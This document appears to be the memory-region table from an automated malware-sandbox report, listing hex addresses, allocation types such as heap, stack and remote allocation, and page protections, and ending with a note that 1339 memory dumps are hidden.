direct allocation
page read and write
D71000
unkown
page read and write
51E000
heap
page read and write
9F7000
stack
page read and write
37F4000
heap
page read and write
365A000
heap
page read and write
343F000
stack
page read and write
422000
unkown
page write copy
13F4000
unkown
page readonly
3FD6000
heap
page read and write
35F2000
heap
page read and write
5B1000
unkown
page execute and write copy
411000
unkown
page readonly
1594000
trusted library allocation
page read and write
9C000
stack
page read and write
14DFF500000
heap
page read and write
293E000
stack
page read and write
5A3000
unkown
page write copy
1630000
trusted library allocation
page execute and read and write
358B000
heap
page read and write
64E000
stack
page read and write
2040000
direct allocation
page read and write
4F80000
heap
page read and write
2F01000
heap
page read and write
81F000
stack
page read and write
2D00000
heap
page read and write
49B000
unkown
page read and write
B9F000
unkown
page readonly
32BE000
stack
page read and write
3580000
heap
page read and write
411000
unkown
page readonly
14DFF08B000
heap
page read and write
2F01000
heap
page read and write
2DDD000
stack
page read and write
2028000
direct allocation
page read and write
29F4000
heap
page read and write
400000
unkown
page readonly
8B8000
heap
page read and write
362F000
heap
page read and write
2C42000
heap
page read and write
352B000
heap
page read and write
2EEE000
stack
page read and write
2A88000
heap
page read and write
10000000
direct allocation
page read and write
29F4000
heap
page read and write
1F0000
heap
page read and write
3660000
heap
page read and write
A00000
heap
page read and write
2010000
direct allocation
page read and write
49A000
unkown
page write copy
2F01000
heap
page read and write
2C42000
heap
page read and write
616000
heap
page read and write
443D000
stack
page read and write
CAA000
unkown
page readonly
2E9E000
stack
page read and write
29F4000
heap
page read and write
7D3000
heap
page read and write
835000
heap
page read and write
1B00000
direct allocation
page read and write
29F4000
heap
page read and write
5BCD000
direct allocation
page read and write
5BC1000
direct allocation
page read and write
58E000
heap
page read and write
1077000
unkown
page read and write
5D0000
heap
page read and write
2090000
heap
page read and write
2F01000
heap
page read and write
570000
heap
page read and write
F80000
heap
page read and write
2CD0000
heap
page read and write
5BD1000
direct allocation
page read and write
5BDD000
direct allocation
page read and write
14DFF03C000
heap
page read and write
10001000
direct allocation
page execute read
3681000
heap
page read and write
158E000
heap
page read and write
29F4000
heap
page read and write
2D25000
heap
page read and write
2F01000
heap
page read and write
355E000
stack
page read and write
9B0000
direct allocation
page read and write
19EE000
stack
page read and write
9FE000
stack
page read and write
100B000
unkown
page readonly
29F4000
heap
page read and write
7D7000
heap
page read and write
422000
unkown
page write copy
300000
heap
page read and write
2171000
direct allocation
page read and write
268E000
stack
page read and write
18C6000
direct allocation
page read and write
2E8B000
stack
page read and write
357F000
stack
page read and write
29F4000
heap
page read and write
1864000
direct allocation
page read and write
47D757B000
stack
page read and write
29F4000
heap
page read and write
21B80000
direct allocation
page read and write
427000
unkown
page readonly
2F01000
heap
page read and write
9C000
stack
page read and write
2F01000
heap
page read and write
18D2000
direct allocation
page read and write
2F01000
heap
page read and write
10011000
direct allocation
page readonly
1A90000
direct allocation
page read and write
2240000
heap
page read and write
2C23000
heap
page read and write
47B000
unkown
page execute and write copy
36A7000
heap
page read and write
1814000
direct allocation
page read and write
15E0000
trusted library allocation
page read and write
20AD000
heap
page read and write
2E0F000
stack
page read and write
685000
unkown
page readonly
45BC000
stack
page read and write
315F000
stack
page read and write
2F01000
heap
page read and write
420000
unkown
page write copy
2C42000
heap
page read and write
4330000
heap
page read and write
5A5000
unkown
page write copy
D6B9000
heap
page read and write
2AA0000
heap
page read and write
14DFF124000
heap
page read and write
B3B000
stack
page read and write
305E000
stack
page read and write
2190000
direct allocation
page read and write
5B3000
unkown
page execute and write copy
327F000
stack
page read and write
29F4000
heap
page read and write
352C000
heap
page read and write
18C0000
direct allocation
page read and write
5A1000
unkown
page execute and write copy
10DD000
stack
page read and write
2178000
direct allocation
page read and write
590000
heap
page read and write
18C2000
direct allocation
page read and write
2D13000
heap
page read and write
38FD000
stack
page read and write
26A0000
heap
page read and write
401000
unkown
page execute read
2FCB000
heap
page read and write
352F000
heap
page read and write
26FB000
stack
page read and write
14DFF08B000
heap
page read and write
2A4D000
stack
page read and write
3699000
heap
page read and write
35D2000
heap
page read and write
2C23000
heap
page read and write
29F4000
heap
page read and write
2C0F000
heap
page read and write
2B0F000
unkown
page read and write
18B0000
direct allocation
page read and write
7C2000
heap
page read and write
1137000
unkown
page read and write
29F4000
heap
page read and write
2D44000
heap
page read and write
8EF000
stack
page read and write
2E50000
trusted library allocation
page read and write
29F4000
heap
page read and write
2F01000
heap
page read and write
DF0000
heap
page read and write
3670000
heap
page read and write
15CB000
trusted library allocation
page execute and read and write
2304000
heap
page read and write
34C9000
heap
page read and write
334E000
stack
page read and write
34C6000
heap
page read and write
29F4000
heap
page read and write
2228000
direct allocation
page read and write
D8CA000
heap
page read and write
2520000
heap
page read and write
B80000
heap
page read and write
4DDF000
stack
page read and write
2C23000
heap
page read and write
29F4000
heap
page read and write
41B000
unkown
page readonly
26B1000
heap
page read and write
1001A000
direct allocation
page read and write
29F4000
heap
page read and write
1908000
direct allocation
page read and write
189C000
direct allocation
page read and write
C0E000
stack
page read and write
55E000
stack
page read and write
2E60000
heap
page read and write
2F01000
heap
page read and write
3AD0000
heap
page read and write
2F00000
heap
page read and write
645000
heap
page read and write
1593000
trusted library allocation
page execute and read and write
29F4000
heap
page read and write
2678000
heap
page read and write
BD0000
heap
page read and write
2C42000
heap
page read and write
181F000
stack
page read and write
26B2000
heap
page read and write
2F01000
heap
page read and write
40B000
unkown
page read and write
1818000
direct allocation
page read and write
1886000
direct allocation
page read and write
29F4000
heap
page read and write
2F01000
heap
page read and write
1860000
direct allocation
page read and write
180A000
direct allocation
page read and write
15A0000
trusted library allocation
page read and write
32C0000
heap
page read and write
15EF000
stack
page read and write
291B000
stack
page read and write
31E0000
heap
page read and write
2910000
heap
page read and write
341E000
stack
page read and write
11AC000
heap
page read and write
423000
unkown
page read and write
188E000
direct allocation
page read and write
2F01000
heap
page read and write
29F4000
heap
page read and write
2F9A000
heap
page read and write
36B0000
heap
page read and write
3681000
heap
page read and write
369D000
heap
page read and write
2B10000
heap
page read and write
1378000
unkown
page read and write
3348000
heap
page read and write
29F4000
heap
page read and write
2F01000
heap
page read and write
1370000
heap
page read and write
3AF8000
heap
page read and write
3230000
heap
page read and write
400000
unkown
page readonly
35DF000
stack
page read and write
5BD000
unkown
page execute and write copy
315F000
stack
page read and write
305D000
heap
page read and write
48EF000
stack
page read and write
2540000
heap
page read and write
10AE000
stack
page read and write
2D1E000
stack
page read and write
4CFF000
stack
page read and write
29F4000
heap
page read and write
1890000
direct allocation
page read and write
7B0000
heap
page read and write
7C5000
heap
page read and write
F9D000
heap
page read and write
2F01000
heap
page read and write
BA2000
unkown
page execute and write copy
3F7F000
stack
page read and write
5F0000
heap
page read and write
5F5000
heap
page read and write
2F01000
heap
page read and write
1896000
direct allocation
page read and write
431D000
stack
page read and write
2F01000
heap
page read and write
2D25000
heap
page read and write
3D3F000
stack
page read and write
261000
remote allocation
page execute read
409000
unkown
page execute and read and write
437F000
stack
page read and write
10DA000
heap
page read and write
617000
heap
page read and write
2510000
heap
page read and write
304B000
heap
page read and write
4C0000
heap
page read and write
2F01000
heap
page read and write
29F4000
heap
page read and write
2F01000
heap
page read and write
14DFF079000
heap
page read and write
2C9C000
stack
page read and write
41B000
unkown
page readonly
1810000
direct allocation
page read and write
4E9E000
stack
page read and write
2F5C000
stack
page read and write
35FC000
heap
page read and write
1102000
heap
page read and write
265D000
stack
page read and write
2190000
heap
page read and write
152E000
heap
page read and write
2C42000
heap
page read and write
3121000
heap
page read and write
49D000
unkown
page write copy
2054000
heap
page read and write
287F000
stack
page read and write
3FE6000
heap
page read and write
2C42000
heap
page read and write
2D8B000
stack
page read and write
5BE7000
direct allocation
page read and write
10D9000
unkown
page read and write
29F4000
heap
page read and write
3F8B000
heap
page read and write
E95000
heap
page read and write
2AE000
remote allocation
page execute and read and write
348F000
stack
page read and write
5A4000
unkown
page write copy
3522000
heap
page read and write
2956000
stack
page read and write
1A8E000
direct allocation
page read and write
4440000
remote allocation
page read and write
3D7E000
stack
page read and write
21B82000
direct allocation
page read and write
1A6E000
direct allocation
page read and write
188A000
direct allocation
page read and write
2F01000
heap
page read and write
36D7000
heap
page read and write
1050000
heap
page read and write
2F01000
heap
page read and write
29F4000
heap
page read and write
10D0000
heap
page read and write
18D4000
direct allocation
page read and write
29F0000
heap
page read and write
A10000
unkown
page readonly
29F4000
heap
page read and write
2F01000
heap
page read and write
4025000
trusted library allocation
page read and write
18A0000
direct allocation
page read and write
1D10000
direct allocation
page read and write
2FEF000
stack
page read and write
400000
remote allocation
page execute and read and write
186E000
direct allocation
page read and write
882000
heap
page read and write
1567000
heap
page read and write
2A5E000
stack
page read and write
268B000
heap
page read and write
335B000
heap
page read and write
317F000
stack
page read and write
2F01000
heap
page read and write
3642000
heap
page read and write
29F4000
heap
page read and write
460000
heap
page read and write
3270000
heap
page read and write
2F01000
heap
page read and write
36A6000
heap
page read and write
B9F000
unkown
page readonly
2C23000
heap
page read and write
400000
unkown
page execute and read and write
352E000
heap
page read and write
106D000
heap
page read and write
2F9A000
heap
page read and write
29F4000
heap
page read and write
18BA000
direct allocation
page read and write
BA4000
unkown
page readonly
36A1000
heap
page read and write
3120000
heap
page read and write
472000
unkown
page readonly
10000000
direct allocation
page read and write
2CEF000
stack
page read and write
2C42000
heap
page read and write
2D1D000
heap
page read and write
13F1000
unkown
page write copy
37DC000
heap
page read and write
691000
unkown
page readonly
2F01000
heap
page read and write
3010000
heap
page execute and read and write
FC1000
unkown
page read and write
3280000
heap
page read and write
2697000
heap
page read and write
564000
heap
page read and write
2F01000
heap
page read and write
5F0000
heap
page read and write
1846000
direct allocation
page read and write
6D5000
heap
page read and write
29F4000
heap
page read and write
490000
heap
page read and write
1F0000
heap
page read and write
5A0000
heap
page read and write
2180000
heap
page read and write
2C42000
heap
page read and write
13F1000
unkown
page read and write
2C17000
heap
page read and write
2F01000
heap
page read and write
2F01000
heap
page read and write
4382000
heap
page read and write
7F1000
heap
page read and write
2F01000
heap
page read and write
423000
unkown
page read and write
2E4E000
stack
page read and write
1848000
direct allocation
page read and write
5DE000
stack
page read and write
5D4000
heap
page read and write
2860000
heap
page read and write
23A0000
direct allocation
page read and write
29F4000
heap
page read and write
14DFF03A000
heap
page read and write
2F01000
heap
page read and write
2F01000
heap
page read and write
180E000
direct allocation
page read and write
918000
direct allocation
page read and write
340E000
stack
page read and write
5AB000
unkown
page execute and write copy
2BEE000
stack
page read and write
2B75000
heap
page read and write
269E000
heap
page read and write
FCD000
heap
page read and write
3FF2000
heap
page read and write
18D6000
direct allocation
page read and write
29F4000
heap
page read and write
181C000
direct allocation
page read and write
355F000
stack
page read and write
3681000
heap
page read and write
14DFF07B000
heap
page read and write
15C0000
trusted library allocation
page read and write
44D000
stack
page read and write
910000
direct allocation
page read and write
2EA0000
trusted library allocation
page read and write
21D4000
heap
page read and write
1876000
direct allocation
page read and write
3FAB000
heap
page read and write
D71000
unkown
page write copy
14DFF07A000
heap
page read and write
2F01000
heap
page read and write
36A7000
heap
page read and write
401000
unkown
page execute read
5BD3000
direct allocation
page read and write
29F4000
heap
page read and write
1A88000
direct allocation
page read and write
49E000
heap
page read and write
2D32000
heap
page read and write
400000
unkown
page readonly
21B0000
direct allocation
page read and write
100B000
unkown
page readonly
2F01000
heap
page read and write
2F01000
heap
page read and write
3624000
heap
page read and write
33BF000
stack
page read and write
366F000
heap
page read and write
2E00000
heap
page read and write
18CE000
direct allocation
page read and write
2670000
heap
page read and write
10000000
unkown
page readonly
A90000
remote allocation
page read and write
11E5D000
direct allocation
page execute and read and write
1A80000
direct allocation
page read and write
2C7C000
stack
page read and write
29F4000
heap
page read and write
F7D000
unkown
page read and write
2DE0000
heap
page read and write
106D000
heap
page read and write
2CDA000
direct allocation
page execute and read and write
29F0000
heap
page read and write
420000
unkown
page read and write
29F4000
heap
page read and write
3370000
heap
page read and write
2F01000
heap
page read and write
75E000
heap
page read and write
3680000
heap
page read and write
23EE000
stack
page read and write
14DFEFA0000
heap
page read and write
FC5000
heap
page read and write
A90000
heap
page read and write
8C5000
heap
page read and write
28CE000
stack
page read and write
3230000
heap
page read and write
5A10000
direct allocation
page read and write
2CF8000
heap
page read and write
2F01000
heap
page read and write
1660000
heap
page read and write
433E000
stack
page read and write
327C000
stack
page read and write
2C42000
heap
page read and write
2018000
direct allocation
page read and write
442000
unkown
page read and write
610000
heap
page read and write
4D9000
heap
page read and write
401000
unkown
page execute read
2D40000
heap
page read and write
2F01000
heap
page read and write
FAD000
unkown
page read and write
26D4000
heap
page read and write
1A82000
direct allocation
page read and write
29F4000
heap
page read and write
4A2E000
stack
page read and write
58D000
heap
page read and write
2CB0000
heap
page read and write
12B0000
direct allocation
page read and write
367B000
heap
page read and write
1808000
direct allocation
page read and write
10002000
unkown
page readonly
2E80000
heap
page read and write
29DE000
stack
page read and write
305C000
heap
page read and write
10BA000
unkown
page read and write
152A000
heap
page read and write
36A9000
heap
page read and write
14DFF013000
unkown
page read and write
2F01000
heap
page read and write
29F0000
heap
page read and write
2F01000
heap
page read and write
2BDE000
heap
page read and write
380C000
heap
page read and write
2E4D000
stack
page read and write
FE2000
heap
page read and write
29F4000
heap
page read and write
10B7000
unkown
page read and write
5C7000
unkown
page execute and write copy
710000
heap
page read and write
273A000
stack
page read and write
2C42000
heap
page read and write
1180000
heap
page read and write
29F4000
heap
page read and write
58C000
stack
page read and write
19D000
stack
page read and write
1107000
heap
page read and write
5890000
heap
page read and write
2F01000
heap
page read and write
423E000
stack
page read and write
21C0000
heap
page read and write
1880000
direct allocation
page read and write
23A0000
heap
page read and write
34CB000
heap
page read and write
D61F000
heap
page read and write
EF9000
stack
page read and write
19C000
stack
page read and write
35BA000
heap
page read and write
1003000
heap
page read and write
118A000
heap
page read and write
361E000
heap
page read and write
10BE000
unkown
page read and write
21C9000
heap
page read and write
2A0E000
stack
page read and write
2F01000
heap
page read and write
106D000
heap
page read and write
1ED1000
heap
page read and write
10001000
unkown
page execute read
5BCF000
direct allocation
page read and write
34C4000
heap
page read and write
26FB000
heap
page read and write
634000
unkown
page write copy
2F01000
heap
page read and write
18B2000
direct allocation
page read and write
2880000
heap
page read and write
401000
unkown
page execute read
18A6000
direct allocation
page read and write
3040000
heap
page read and write
400000
unkown
page readonly
560000
heap
page read and write
35B7000
heap
page read and write
6A0000
heap
page read and write
32F0000
heap
page read and write
420000
unkown
page write copy
13F4000
unkown
page readonly
588000
heap
page read and write
333E000
stack
page read and write
400000
unkown
page readonly
185E000
unkown
page read and write
2F01000
heap
page read and write
2D70000
heap
page read and write
There are 1339 hidden memdumps, click here to show them.